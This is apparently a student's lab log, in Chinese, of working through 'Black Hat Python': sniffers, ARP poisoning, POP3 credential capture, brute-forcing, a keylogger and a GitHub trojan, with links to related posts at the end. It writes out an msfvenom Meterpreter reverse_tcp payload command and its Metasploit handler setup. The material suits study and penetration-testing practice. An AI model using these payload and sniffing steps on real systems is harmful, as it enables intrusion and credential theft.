2017-2018-2 20179204 PYTHON黑帽子 黑客与渗透测试编程之道
python代码见码云:20179204_gege
第2章 网络基础
- tcp客户端(tcpclient.py),可以看到百度返回的HTTP响应。
- udp客户端(udpclient.py)
首先先用nc监听一下9999端口,-u就是udp模式,哈哈发过去了,最后打印出了ip和端口,nc没发数据过来,可能就没收到数据。
现在就可以比较一下tcp和udp的区别了,最核心的是udp不用连接,因为是无状态的协议
发送和接受的函数也是有区别的,通过实验发现recv和recvfrom的参数是接收几个字符的意思。
- tcp服务器(tcpserver.py tcpclient1.py)
- 取代netcat (bhnet.py)
打开一个终端
./bhnet.py -l -p 9999 -c
打开新终端./bhnet.py -t localhost -p 9999
输入ctrl+d
创建一个tcp代理proxy (proxy.py)
设置浏览器代理127.0.0.1:80
sudo python ./proxy.py 127.0.0.1 80 www.baidu.com 80 True
打开浏览器
.
通过paramiko使用ssh (bh_sshcmd.py bh_sshRcmd.py bh_sshserver.py)
参考博客Python黑帽子——通过Paramiko使用SSHpip install paramiko
生成密钥 ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key
添加用户 useradd -d /home/qing qing
passwd qing
赋予ssh权限 vi /etc/ssh/sshd_config,添加 AllowUsers:qing
测试、运行结果
python bh_sshcmd.py
python bh_sshserver.py 127.0.0.1 80
python bh_sshRcmd.py
可以在服务器端输入一条命令mkdir ddr新建一个ddr文件夹
ssh隧道 (rforward.py bh_sshserver.py)建议在终端同时输一下
不设置浏览器代理
终端1:python rforward.py 127.0.0.1 -p 8080 -r 127.0.0.1:80 --user gege --password
gege
终端2:python bh_sshserver.py 127.0.0.1 80
终端3:python bh_sshRcmd.py
刷新浏览器127.0.0.1:8080
第3章 网络:原始套接字和流量嗅探
- linux上的嗅探器 (sniffer.py)注意修改代码中的ip地址
- linux下测试解码ip层 (sniffer_ip_header_decode)注意修改代码中的ip地址
- 解码ICMP (sniffer_with_icmp.py)注意修改代码中的ip地址
type0 code0 说明Echo Reply——回显应答(Ping应答)
解码ICMP
注:回显请求与回显应答是两种icmp报文类型,类型号分别是8和0,这两种类型下都只有一种代码0。这两种icmp报文属查询报文,主要用于测试网络中另一台主机是否可达,向欲测试主机发送一份ICMP回显请求,并等待返回ICMP回显应答,如果能收到,表明该主机可达。
- 子网扫描器 (sniffer.py)注意修改代码中的ip地址和子网地址
第4章 网络:原始套接字和流量嗅探
- 简单嗅探器(mail_test.py)
- 窃取email认证(mail_sniffer)
需要用命令行模拟邮件登陆(当然我用的是错误的用户名和密码,所以下图是不能登录成功的,但已经说明抓取成功),这里以登陆网易的pop3服务器为例 telnet pop3.163.com 110
利用scapy进行arp缓存投毒(arptest.py)需要修改代码中两个ip地址
攻击机kali,目标机win2k。
kali上ping攻击机。
在win上输入命令ipconfig /all,arp -a检查arp缓存。
首先要开启对网关和目标ip地址的流量进行转发的功能:
echo 1 > /proc/sys/net/ipv4/ip_forward
处理pcap文件(pic_carver1.py)“人脸识别”
安装opencv: apt-get install python-opencv python-numpy python-scipy
wget http://eclecti.cc/files/2008/03/haarcascade_frontalface_alt.xml
第5章 web攻击
- 开源web应用安装(web_app_mapper.py)
web_app_mapper1.py是课本的代码 web_app_mapper2.py。这里作者应该是利用开源应用的本地文件目录信息去访问目标网站的对应目录,看看哪些目录是跟官方的一样的,举个例子:比如有没有install目录。
暴力破解目录和文件位置(content_bruter.py),其中字典文件all.txt
暴力破解html表格认证(joomla_killer.py)
这个要搭建apache服务器,单纯做不出。
第6章 扩展burp代理
- burp模糊测试(bhp_fuzzer.py)
打开burpsuite,environment 选择jar文件路径
extender——add——bup_fuzzer.py(课本97步骤)
- 在burp中利用bing服务(bhp_bing.py)课本105步骤
- 利用网站内容生成密码字典(bhp_wordlist.py)课本111步骤
第7章 基于GitHub的命令和控制
- 基于github通信的木马(git_trojan.py)失败。
第8章 windows下木马的常用功能(沙盒检测没做)
- 有趣的键盘记录(winxpattacker下运行,C:\Documents and Settings\Administrator文件夹下keylogger.py)
安装过程:
IDLE——run module
无论键盘输入什么,都会被记录下来。
截取屏幕快照(winxpattacker下运行,screenshotter.py)
截图保存在c:\WINDOWS\Temp\screenshot.bmp下。python方式的shellcode执行【kali下输入metasploit命令行,winxp下运行需要改代码,windows弹出计算器calc.exe】(shell_exec.py)
kali:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.43.62.77 LPORT=1234 -f raw -o win_backdoor.raw
base64 -i win_backdoor.raw > shellcode.bin
python -m SimpleHTTPServer
metasploit下:
use exploit/multi/handler
set LHOST 10.43.62.77
set LPORT 1234
exploit
winxppython运行
kaliexecute -f calc.exe,在win下查看结果:
第9章 玩转浏览器
- 基于浏览器的中间人攻击
- 利用IE的COM组件自动化技术窃取数据
本章只实现了创建一个简单快速的RSA公私钥生成脚本(keygen.py)
第10章 windows系统提权(代码插入没做)
- 利用WMI监视进程(process_monitor.py)
直接在cmd命令行下python运行,日志只显示在process_monitor_log.csv里了。
- windows系统的令牌权限(process_monitor1.py)
- 赢得竞争(file_monitor1.py)
第11章 自动化攻击取证(本章没成功)
抓取口令的哈希值
直接代码注入(code_inject.py)失败
2017-2018-2 20179204 PYTHON黑帽子 黑客与渗透测试编程之道的更多相关文章
- 读书笔记 ~ Python黑帽子 黑客与渗透测试编程之道
Python黑帽子 黑客与渗透测试编程之道 <<< 持续更新中>>> 第一章: 设置python 环境 1.python软件包管理工具安装 root@star ...
- python黑帽子-黑客与渗透测试编程之道(源代码)
链接: https://pan.baidu.com/s/1i5BnB5V 密码: ak9t
- 《Python黑帽子:黑客与渗透测试编程之道》 Scapy:网络的掌控者
窃取email认证: 测试代码: #!/usr/bin/python #coding=utf-8 from scapy.all import * #数据包回调函数 def packet_callbac ...
- 《Python黑帽子:黑客与渗透测试编程之道》 玩转浏览器
基于浏览器的中间人攻击: #coding=utf-8 import win32com.client import time import urlparse import urllib data_rec ...
- 《Python黑帽子:黑客与渗透测试编程之道》 Windows下木马的常用功能
有趣的键盘记录: 安装pyHook: http://nchc.dl.sourceforge.net/project/pyhook/pyhook/1.5.1/pyHook-1.5.1.win32-py2 ...
- 《Python黑帽子:黑客与渗透测试编程之道》 基于GitHub的命令和控制
GitHub账号设置: 这部分按书上来敲命令即可,当然首先要注册一个GitHub账号还有之前安装的GitHub API库(pip install github3.py),这里就只列一下命令吧: mkd ...
- 《Python黑帽子:黑客与渗透测试编程之道》 扩展Burp代理
下载jython,在Burpsuite的扩展中配置jython路径: Burp模糊测试: #!/usr/bin/python #coding=utf-8 # 导入三个类,其中IBurpExtender ...
- 《Python黑帽子:黑客与渗透测试编程之道》 Web攻击
Web的套接字函数库:urllib2 一开始以urllib2.py命名脚本,在Sublime Text中运行会出错,纠错后发现是重名了,改过来就好: #!/usr/bin/python #coding ...
- 《Python黑帽子:黑客与渗透测试编程之道》 网络:原始套接字和流量嗅探
Windows和Linux上的包嗅探: #!/usr/bin/python import socket import os #监听的主机 host = "10.10.10.160" ...
随机推荐
- 图片url转base64
var xhr = new XMLHttpRequest() // 配置的代理,解决跨域问题 xhr.open('GET', url.replace('http://xxx.com', '/img') ...
- ES6箭头函数基本用法
ES6箭头函数基本用法 ``` window.onload = function(){ alert(abc); } //箭头函数 window.onload = ()=>{ alert(&quo ...
- PHP 二维数组某个字段进行排序
/** * @param $arrUsers * @return mixed *二维数组某个字段进行排序 */ function quick_sort($arrUsers) { $sort = arr ...
- JZOJ 100029. 【NOIP2017提高A组模拟7.8】陪审团
100029. [NOIP2017提高A组模拟7.8]陪审团 Time Limits: 1000 ms Memory Limits: 131072 KB Detailed Limits Got ...
- CMDB(资产管理系统) day1
运维自动化最重要的就是标准化一切 自动化运维则支持以下功能: 1.OS的选择统一化,同一个项目使用同样的OS系统部署其所需要的各类软件.2.软件安装标准化,例如JAVA虚拟机,php,nginx,my ...
- Scrapy-redis分布式爬虫爬取豆瓣电影详情页
平时爬虫一般都使用Scrapy框架,通常都是在一台机器上跑,爬取速度也不能达到预期效果,数据量小,而且很容易就会被封禁IP或者账号,这时候可以使用代理IP或者登录方式爬,然而代理IP很多时候都很鸡肋, ...
- Python的while else
python中有一个其独有的功能,while else. 它的作用是判断是循环是否被终止,如果没有被终止,那么就会执行else,反之则不会执行.还是用一段代码来解释吧 else被执行: count = ...
- PowerShell批量配置VM端点
我们可以通过PowerShell脚本批量添加VM端点.请您参考以下方案. 准备工作 – PowerShell连接China Azure 1. 从官网下载页面,下载并安装Windows Azure Po ...
- 【Python】函数参数类型及用法
一.函数的参数类型 def hs(a1,a2,a3,...): ****statements 其中a1,a2,a3是函数的参数,函数的参数类型可分为:必须参数.默认参数.可变参数(不定长参数).关键 ...
- 成为Java高手的25个学习要点
成为Java高手的25个学习要点 想成为Java大牛吗?不妨来学习这25个要点. 1. 你需要精通面向对象分析与设计(OOA/OOD).涉及模式(GOF,J2EEDP)以及综合模式.你应该了解UML, ...





.






















































